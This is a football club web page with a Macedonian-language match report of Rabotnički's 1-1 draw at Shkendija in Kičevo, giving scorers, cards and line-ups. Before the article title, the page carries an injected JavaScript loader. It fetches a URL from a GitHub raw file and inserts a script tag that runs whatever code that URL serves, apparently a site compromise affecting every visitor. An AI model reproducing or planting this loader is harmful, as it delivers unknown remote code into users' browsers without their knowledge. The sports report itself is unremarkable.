;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реми против Шкендија (1-1) во Кичево
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реми против Шкендија (1-1) во Кичево

Работнички одигра 1-1 против Шкендија на денешното гостување во Кичево, во рамките на 16.првенствено коло. Избраниците на Игор Ангеловски одиграа квалитетен натпревар и беа рамноправен, а на моменти и подобар ривал од Шкендија. На крајот, дојде до поделба на бодовите.

Работнички прв поведе. Во 20.минута, по една одлична акција на нашиот тим, Милован Петровиќ се одлучи на удар од 16 метри и успеа да го совлада Марко Јовановски, за водство од 0-1.

Шкендија по примениот гол нападна многу посериозно и иницијативата ја искористи Бесарт Ибраими кој во 36.минута го израмни резултатот. Три минути подоцна Ибраими имаше уште една убава можност, но Даниел Божиновски беше на вистинското место и го спаси својот гол.

skendija - rabotnicki 2

Во вториот дел, и двете екипи имаа свои шанси, но реализацијата изостана. Илијоски се закани кон голот на Јовановски, но без ефект. Во 80.минута, Благоја Тодоровски имаше убава можност за Шкендија, но нашата одбрана успеа да спаси и да исфрли во корнер.Четири минути подоцна, Марко Јовановски имаше слаб ангажман, Кире Маркоски беше во акција, се закани кон противничкиот гол, но, сепак, чуварот на мрежата на Шкендија одбрани.

До крајот Работнички умешно ја држеше играта под контрола и успеа да ремизира против второпласираната Шкендија.

По 16.првенствено коло, нашиот тим се наоѓа на четвртата позиција на табелата со 22 освоени бода.

ШКЕНДИЈА – РАБОТНИЧКИ 1-1 (1-1)

Стадион во Кичево. Гледачи: 1.000. Судија: Марјан Маркоски (Охрид). Стрелци: Ибраими 36’ (Шке), Петровиќ 20’ (Раб). Жолти картони: Бејтулаи (Шке), Трајчевски, Најдовски (Раб).

ШКЕНДИЈА: Јовановски, Бејтулаи, Реч, Положани, Цуцули, Усеини (80’ Тотре), Алими, Тодоровски, Жуниор, Радески (71’ Кировски), Ибраими.

РАБОТНИЧКИ: Божиновски, Силјановски (79’ С. Сахити), Илиевски, Ристевски, Најдовски, Цикарски, Трајчевски, Вујчиќ (88’ Јованоски), Петровиќ, Алтипармаковски (61’ Маркоски), Илијоски.

Leave a Reply